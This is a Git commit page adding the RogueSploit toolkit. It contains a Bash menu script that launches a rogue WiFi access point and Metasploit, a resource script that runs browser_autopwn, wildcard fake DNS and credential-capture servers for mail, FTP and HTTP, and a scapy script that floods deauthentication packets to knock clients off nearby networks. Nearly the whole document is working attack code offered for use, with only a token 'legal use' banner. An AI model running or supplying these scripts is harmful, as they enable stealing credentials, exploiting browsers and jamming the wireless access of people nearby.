aljaz/RogueSploit
1
0
Fork 0
mirror of https://github.com/aljazceru/RogueSploit.git synced 2025-12-17 06:14:21 +01:00
Code Issues Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
Francesco Grotti
2016-11-27 19:00:56 +01:00
committed by GitHub
parent a317cf4304
commit 9da4ff4e90
5 changed files with 751 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

195
RogueAP-Autopwn.sh Normal file
View File

@@ -0,0 +1,195 @@
#!/bin/bash
##############################################################################################################
# FAKE AP AUTOPWN w/ KARMA #
# by _B4ckp0r7 #
#This is a simple script for creating a fake access point with #
#dhcpd configuration, dns redirections, sniffing and browser_autopwn1 (i'll upgrade to 2nd soon) #
##############################################################################################################
#colors
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
#Checking
[[ `id -u` -eq 0 ]] || { echo -e "\e[31mMust be root to run script"; exit 1; }
resize -s 33 84 > /dev/null
clear
###################################################
# CTRL C
###################################################
trap ctrl_c INT
ctrl_c() {
clear
echo -e $red"--<[!] (Ctrl + C ) Detected, Trying To Exit... [!]>--"
sleep 1
echo ""
echo -e $red"--<[*] Stopping all service , Wait... [*]>--"
sleep 1
echo -e $yellow"--<[*] Hope you pwned someone today! [*]>--"
echo -e $yellow"--<[*] Thank You For Using Karmasploit B) [*]>--"
exit
}
#WARNING !!!
clear
echo -e $red" Loading the world..."
sleep 2
echo -e $red""
echo " =================================================================="
echo "| PLEASE USE ONLY FOR LEGAL | AUTHORIZED | STUDY PURPOSES |"
echo " =================================================================="
echo ""
echo -n "Press any key to continue .............."
read warning
autopwning () {
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
touch /var/lib/dhcp/dhcpd.leases
dhcpd -cf /etc/dhcp/dhcpd.conf at0
msfconsole -q -r $(pwd)/karma.rc
}
#menu1
menu () {
clear
echo -e $yellow"--<"$blue"[*]"$yellow" Roguesploit -- by _B4ckp0r7 "$blue"[*]"$yellow">--"
echo -e $lightgreen"--<[?] What do you want to do? [?]>-- ";
echo -e $lightgreen" 1. Start RogueAP"
echo -e $lightgreen" 2. Start Pwning Services"
echo -e $lightgreen" 3. Start WiFi Massive Jammer"
echo -e $lightgreen" 4. Credits"
echo -e $lightgreen" 5. Exit"
echo -ne $yellow"root@B4ckp0r7:"; read answer1
if test $answer1 == '1'
then
xterm -title "Rogue AP" -fa monaco -bg black -e "./rogueapstart.sh"
menu
elif test $answer1 == '2'
then
clear
autopwning
menu
elif test $answer1 == '3'
then
xterm -title "Wifi Massive Jammer" -fa monaco -bg black -e "./wifijammer.py"
menu
elif test $answer1 == '4'
then
echo -e "Made by B4ckP0r7 with love, Italian Engeering"
echo -e $blue" Big thanks to:"
echo -e $red"--<[ My friends ]>--"
echo -e $green"--<[ QuantumSec ]>--"
echo -e $white"--<[ And averyone who ever supported me ]>--"
echo -e $blue" Press any key to continue... "
read continuee
menu
elif test $answer1 == '5'
then
clear
ifconfig at0 down
pkill airmon-ng
pkill airbase-ng
echo -e $red"Goodbye.."
sleep 2
clear
exit
else
echo -e $red"[!] Incorrect Number [!]"
echo -n -e $yellow" Do you want exit? ( Yes / No ) :"
read back
if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'No' ]
then
echo -e $red"--<[*] Stopping all service , Wait... [*]>--"
pkill airmon-ng
pkill airbase-ng
sleep 1
echo -e $yellow"--<[*] Hope you pwned someone today! [*]>--"
echo -e $yellow"--<[*] Thank You For Using Karmasploit B) [*]>--"
sleep 2
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'Yes' ]
then
menu
fi
fi
}
#menu2
clear
echo -e $yellow"--<"$blue"[*]"$yellow" Roguesploit -- by _B4ckp0r7 "$blue"[*]"$yellow">--"
echo -e $red"[!] YOU MUST HAVE ALL REQUIREMENTS FOR THIS SCRIPT [!]"
echo -e $lightgreen"--<[?] What do you want to do? [?]>-- "
echo -e $lightgreen" 1. Start RogueAP"
echo -e $lightgreen" 2. Start Pwning Services"
echo -e $lightgreen" 3. Start WiFi Massive Jammer"
echo -e $lightgreen" 4. Credits"
echo -e $lightgreen" 5. Exit"
echo -ne $yellow"root@B4ckp0r7:"; read answer1
if test $answer1 == '1'
then
xterm -title "Rogue AP" -fa monaco -bg black -e "./rogueapstart.sh"
menu
elif test $answer1 == '2'
then
clear
autopwning
menu
elif test $answer1 == '3'
then
xterm -title "Wifi Massive Jammer" -fa monaco -bg black -e "./wifijammer.py"
menu
elif test $answer1 == '4'
then
echo -e "Made by B4ckP0r7 with love, Italian Engeering"
echo -e $blue" Big thanks to:"
echo -e $red"--<[ My friends ]>--"
echo -e $green"--<[ QuantumSec ]>--"
echo -e $white"--<[ And averyone who ever supported me ]>--"
echo -e $blue" Press any key to continue... "
read continuee
menu
elif test $answer1 == '5'
then
clear
ifconfig at0 down
pkill airmon-ng
pkill airbase-ng
echo -e $red"Goodbye.."
sleep 2
clear
exit
else
echo -e $red"[!] Incorrect Number [!]"
echo -n -e $yellow" Do you want exit? ( Yes / No ) :"
read back
if [ $back != 'n' ] && [ $back != 'N' ] && [ $back != 'No' ]
then
echo -e $red"--<[*] Stopping all service , Wait... [*]>--"
pkill airmon-ng
pkill airbase-ng
sleep 1
echo -e $yellow"--<[*] Hope you pwned someone today! [*]>--"
echo -e $yellow"--<[*] Thank You For Using Karmasploit B) [*]>--"
sleep 2
clear
exit
elif [ $back != 'y' ] && [ $back != 'Y' ] && [ $back != 'Yes' ]
then
menu
fi
fi

6
dhspoof.jk Normal file
View File

@@ -0,0 +1,6 @@
#nameserver=10.0.0.1
listen-address=10.0.0.1
#auth-server 10.0.0.1,at0,10.0.0.1
bind-interfaces
interface=at0
dhcp-range=10.0.0.100,10.0.0.254,72h

80
karma.rc Normal file
View File

@@ -0,0 +1,80 @@
db_connect postgres:toor@127.0.0.1/msfbook
use auxiliary/server/browser_autopwn
set AUTOPWN_HOST 10.0.0.1
set AUTOPWN_PORT 80
set AUTOPWN_URI /
set LHOST 10.0.0.1
set LPORT 45000
set SRVPORT 80
set URIPATH /
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
use auxiliary/server/capture/pop3
set SRVPORT 995
set SSL true
run
use auxiliary/server/capture/ftp
run
use auxiliary/server/capture/imap
set SSL false
set SRVPORT 143
run
use auxiliary/server/capture/imap
set SSL true
set SRVPORT 993
run
use auxiliary/server/capture/smtp
set SSL false
set SRVPORT 25
run
use auxiliary/server/capture/smtp
set SSL true
set SRVPORT 465
run
use auxiliary/server/fakedns
set TARGETDOMAIN *
set TARGETHOST 10.0.0.1
set SRVPORT 5353
run
use auxiliary/server/fakedns
set TARGETDOMAIN *
set TARGETHOST 10.0.0.1
set SRVPORT 53
run
use auxiliary/server/capture/http
set SRVPORT 80
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 8080
set SSL false
run
use auxiliary/server/capture/http
set SRVPORT 443
set SSL true
run
use auxiliary/server/capture/http
set SRVPORT 8443
set SSL true
run

22
rogueapstart.sh Normal file
View File

@@ -0,0 +1,22 @@
#!/bin/bash
#colors
cyan='\e[0;36m'
green='\e[0;34m'
okegreen='\033[92m'
lightgreen='\e[1;32m'
white='\e[1;37m'
red='\e[1;31m'
yellow='\e[1;33m'
blue='\e[1;34m'
echo -e $yellow"Starting RogueAP"
echo -ne $green"Choose a name for your AP:" ;tput sgr0
read nameap
sleep 1
echo -e $red"[!] YOU NEED WLAN1 INTERFACE FOR THESE [!]"
sleep 1
echo -e $yellow"Starting RogueAP on wlan1 with name $nameap"
sleep 2
sudo airbase-ng -P -C 30 -e "$nameap" -v wlan1

448
wifijammer.py Normal file
View File

@@ -0,0 +1,448 @@
#!/usr/bin/env python
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) # Shut up Scapy
from scapy.all import *
conf.verb = 0 # Scapy I thought I told you to shut up
import os
import sys
import time
from threading import Thread, Lock
from subprocess import Popen, PIPE
from signal import SIGINT, signal
import argparse
import socket
import struct
import fcntl
# Console colors
W = '\033[0m' # white (normal)
R = '\033[31m' # red
G = '\033[32m' # green
O = '\033[33m' # orange
B = '\033[34m' # blue
P = '\033[35m' # purple
C = '\033[36m' # cyan
GR = '\033[37m' # gray
T = '\033[93m' # tan
def parse_args():
#Create the arguments
parser = argparse.ArgumentParser()
parser.add_argument("-s",
"--skip",
help="Skip deauthing this MAC address. \
Example: -s 00:11:BB:33:44:AA")
parser.add_argument("-i",
"--interface",
help="Choose monitor mode interface. \
By default script will find the most powerful \
interface and starts monitor mode on it. \
Example: -i mon5")
parser.add_argument("-c",
"--channel",
help="Listen on and deauth only clients on the specified channel. \
Example: -c 6")
parser.add_argument("-m",
"--maximum",
help="Choose the maximum number of clients to deauth. \
List of clients will be emptied and repopulated \
after hitting the limit. Example: -m 5")
parser.add_argument("-n",
"--noupdate",
help="Do not clear the deauth list when the maximum (-m) \
number of client/AP combos is reached. \
Must be used in conjunction with -m. \
Example: -m 10 -n",
action='store_true')
parser.add_argument("-t",
"--timeinterval",
help="Choose the time interval between packets being sent. \
Default is as fast as possible. \
If you see scapy errors like 'no buffer space' \
try: -t .00001")
parser.add_argument("-p",
"--packets",
help="Choose the number of packets to send in each deauth burst. \
Default value is 1; \
1 packet to the client and 1 packet to the AP. \
Send 2 deauth packets to the client \
and 2 deauth packets to the AP: -p 2")
parser.add_argument("-d",
"--directedonly",
help="Skip the deauthentication packets to the broadcast \
address of the access points and only send them \
to client/AP pairs",
action='store_true')
parser.add_argument("-a",
"--accesspoint",
help="Enter the MAC address of a specific access point to target")
parser.add_argument("--world",
help="N. American standard is 11 channels but the rest \
of the world it's 13 so this options enables the \
scanning of 13 channels",
action="store_true")
return parser.parse_args()
########################################
# Begin interface info and manipulation
########################################
def get_mon_iface(args):
global monitor_on
monitors, interfaces = iwconfig()
if args.interface:
monitor_on = True
return args.interface
if len(monitors) > 0:
monitor_on = True
return monitors[0]
else:
# Start monitor mode on a wireless interface
print '['+G+'*'+W+'] Finding the most powerful interface...'
interface = get_iface(interfaces)
monmode = start_mon_mode(interface)
return monmode
def iwconfig():
monitors = []
interfaces = {}
try:
proc = Popen(['iwconfig'], stdout=PIPE, stderr=DN)
except OSError:
sys.exit('['+R+'-'+W+'] Could not execute "iwconfig"')
for line in proc.communicate()[0].split('\n'):
if len(line) == 0: continue # Isn't an empty string
if line[0] != ' ': # Doesn't start with space
wired_search = re.search('eth[0-9]|em[0-9]|p[1-9]p[1-9]', line)
if not wired_search: # Isn't wired
iface = line[:line.find(' ')] # is the interface
if 'Mode:Monitor' in line:
monitors.append(iface)
elif 'IEEE 802.11' in line:
if "ESSID:\"" in line:
interfaces[iface] = 1
else:
interfaces[iface] = 0
return monitors, interfaces
def get_iface(interfaces):
scanned_aps = []
if len(interfaces) < 1:
sys.exit('['+R+'-'+W+'] No wireless interfaces found, bring one up and try again')
if len(interfaces) == 1:
for interface in interfaces:
return interface
# Find most powerful interface
for iface in interfaces:
count = 0
proc = Popen(['iwlist', iface, 'scan'], stdout=PIPE, stderr=DN)
for line in proc.communicate()[0].split('\n'):
if ' - Address:' in line: # first line in iwlist scan for a new AP
count += 1
scanned_aps.append((count, iface))
print '['+G+'+'+W+'] Networks discovered by '+G+iface+W+': '+T+str(count)+W
try:
interface = max(scanned_aps)[1]
return interface
except Exception as e:
for iface in interfaces:
interface = iface
print '['+R+'-'+W+'] Minor error:',e
print ' Starting monitor mode on '+G+interface+W
return interface
def start_mon_mode(interface):
print '['+G+'+'+W+'] Starting monitor mode off '+G+interface+W
try:
os.system('ifconfig %s down' % interface)
os.system('iwconfig %s mode monitor' % interface)
os.system('ifconfig %s up' % interface)
return interface
except Exception:
sys.exit('['+R+'-'+W+'] Could not start monitor mode')
def remove_mon_iface(mon_iface):
os.system('ifconfig %s down' % mon_iface)
os.system('iwconfig %s mode managed' % mon_iface)
os.system('ifconfig %s up' % mon_iface)
def mon_mac(mon_iface):
'''
http://stackoverflow.com/questions/159137/getting-mac-address
'''
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
info = fcntl.ioctl(s.fileno(), 0x8927, struct.pack('256s', mon_iface[:15]))
mac = ''.join(['%02x:' % ord(char) for char in info[18:24]])[:-1]
print '['+G+'*'+W+'] Monitor mode: '+G+mon_iface+W+' - '+O+mac+W
return mac
########################################
# End of interface info and manipulation
########################################
def channel_hop(mon_iface, args):
'''
First time it runs through the channels it stays on each channel for 5 seconds
in order to populate the deauth list nicely. After that it goes as fast as it can
'''
global monchannel, first_pass
channelNum = 0
maxChan = 11 if not args.world else 13
err = None
while 1:
if args.channel:
with lock:
monchannel = args.channel
else:
channelNum +=1
if channelNum > maxChan:
channelNum = 1
with lock:
first_pass = 0
with lock:
monchannel = str(channelNum)
try:
proc = Popen(['iw', 'dev', mon_iface, 'set', 'channel', monchannel], stdout=DN, stderr=PIPE)
except OSError:
print '['+R+'-'+W+'] Could not execute "iw"'
os.kill(os.getpid(),SIGINT)
sys.exit(1)
for line in proc.communicate()[1].split('\n'):
if len(line) > 2: # iw dev shouldnt display output unless there's an error
err = '['+R+'-'+W+'] Channel hopping failed: '+R+line+W
output(err, monchannel)
if args.channel:
time.sleep(.05)
else:
# For the first channel hop thru, do not deauth
if first_pass == 1:
time.sleep(1)
continue
deauth(monchannel)
def deauth(monchannel):
'''
addr1=destination, addr2=source, addr3=bssid, addr4=bssid of gateway if there's
multi-APs to one gateway. Constantly scans the clients_APs list and
starts a thread to deauth each instance
'''
pkts = []
if len(clients_APs) > 0:
with lock:
for x in clients_APs:
client = x[0]
ap = x[1]
ch = x[2]
# Can't add a RadioTap() layer as the first layer or it's a malformed
# Association request packet?
# Append the packets to a new list so we don't have to hog the lock
# type=0, subtype=12?
if ch == monchannel:
deauth_pkt1 = Dot11(addr1=client, addr2=ap, addr3=ap)/Dot11Deauth()
deauth_pkt2 = Dot11(addr1=ap, addr2=client, addr3=client)/Dot11Deauth()
pkts.append(deauth_pkt1)
pkts.append(deauth_pkt2)
if len(APs) > 0:
if not args.directedonly:
with lock:
for a in APs:
ap = a[0]
ch = a[1]
if ch == monchannel:
deauth_ap = Dot11(addr1='ff:ff:ff:ff:ff:ff', addr2=ap, addr3=ap)/Dot11Deauth()
pkts.append(deauth_ap)
if len(pkts) > 0:
# prevent 'no buffer space' scapy error http://goo.gl/6YuJbI
if not args.timeinterval:
args.timeinterval = 0
if not args.packets:
args.packets = 1
for p in pkts:
send(p, inter=float(args.timeinterval), count=int(args.packets))
def output(err, monchannel):
os.system('clear')
if err:
print err
else:
print '['+G+'+'+W+'] '+mon_iface+' channel: '+G+monchannel+W+'\n'
if len(clients_APs) > 0:
print ' Deauthing ch ESSID'
# Print the deauth list
with lock:
for ca in clients_APs:
if len(ca) > 3:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2].ljust(2)+' - '+T+ca[3]+W
else:
print '['+T+'*'+W+'] '+O+ca[0]+W+' - '+O+ca[1]+W+' - '+ca[2]
if len(APs) > 0:
print '\n Access Points ch ESSID'
with lock:
for ap in APs:
print '['+T+'*'+W+'] '+O+ap[0]+W+' - '+ap[1].ljust(2)+' - '+T+ap[2]+W
print ''
def noise_filter(skip, addr1, addr2):
# Broadcast, broadcast, IPv6mcast, spanning tree, spanning tree, multicast, broadcast
ignore = ['ff:ff:ff:ff:ff:ff', '00:00:00:00:00:00', '33:33:00:', '33:33:ff:', '01:80:c2:00:00:00', '01:00:5e:', mon_MAC]
if skip:
ignore.append(skip)
for i in ignore:
if i in addr1 or i in addr2:
return True
def cb(pkt):
'''
Look for dot11 packets that aren't to or from broadcast address,
are type 1 or 2 (control, data), and append the addr1 and addr2
to the list of deauth targets.
'''
global clients_APs, APs
# return these if's keeping clients_APs the same or just reset clients_APs?
# I like the idea of the tool repopulating the variable more
if args.maximum:
if args.noupdate:
if len(clients_APs) > int(args.maximum):
return
else:
if len(clients_APs) > int(args.maximum):
with lock:
clients_APs = []
APs = []
# We're adding the AP and channel to the deauth list at time of creation rather
# than updating on the fly in order to avoid costly for loops that require a lock
if pkt.haslayer(Dot11):
if pkt.addr1 and pkt.addr2:
pkt.addr1 = pkt.addr1.lower()
pkt.addr2 = pkt.addr2.lower()
# Filter out all other APs and clients if asked
if args.accesspoint:
if args.accesspoint.lower() not in [pkt.addr1, pkt.addr2]:
return
if args.skip:
if args.skip.lower() == pkt.addr2:
return
# Check if it's added to our AP list
if pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp):
APs_add(clients_APs, APs, pkt, args.channel, args.world)
# Ignore all the noisy packets like spanning tree
#if noise_filter(skip, pkt.addr1, pkt.addr2):
# return
# Management = 1, data = 2
if pkt.type in [1, 2]:
clients_APs_add(clients_APs, pkt.addr1, pkt.addr2)
def APs_add(clients_APs, APs, pkt, chan_arg, world_arg):
ssid = pkt[Dot11Elt].info
bssid = pkt[Dot11].addr3.lower()
try:
# Thanks to airoscapy for below
ap_channel = str(ord(pkt[Dot11Elt:3].info))
chans = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11'] if not args.world else ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
if ap_channel not in chans:
return
if chan_arg:
if ap_channel != chan_arg:
return
except Exception as e:
return
if len(APs) == 0:
with lock:
return APs.append([bssid, ap_channel, ssid])
else:
for b in APs:
if bssid in b[0]:
return
with lock:
return APs.append([bssid, ap_channel, ssid])
def clients_APs_add(clients_APs, addr1, addr2):
if len(clients_APs) == 0:
if len(APs) == 0:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
else:
AP_check(addr1, addr2)
# Append new clients/APs if they're not in the list
else:
for ca in clients_APs:
if addr1 in ca and addr2 in ca:
return
if len(APs) > 0:
return AP_check(addr1, addr2)
else:
with lock:
return clients_APs.append([addr1, addr2, monchannel])
def AP_check(addr1, addr2):
for ap in APs:
if ap[0].lower() in addr1.lower() or ap[0].lower() in addr2.lower():
with lock:
return clients_APs.append([addr1, addr2, ap[1], ap[2]])
def stop(signal, frame):
if monitor_on:
sys.exit('\n['+R+'!'+W+'] Closing')
else:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
sys.exit('\n['+R+'!'+W+'] Closing')
if __name__ == "__main__":
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
clients_APs = []
APs = []
DN = open(os.devnull, 'w')
lock = Lock()
args = parse_args()
monitor_on = None
mon_iface = get_mon_iface(args)
conf.iface = mon_iface
mon_MAC = mon_mac(mon_iface)
first_pass = 1
# Start channel hopping
hop = Thread(target=channel_hop, args=(mon_iface, args))
hop.daemon = True
hop.start()
signal(SIGINT, stop)
try:
sniff(iface=mon_iface, store=0, prn=cb)
except Exception as msg:
remove_mon_iface(mon_iface)
os.system('service network-manager restart')
print '\n['+R+'!'+W+'] Closing'
sys.exit(0)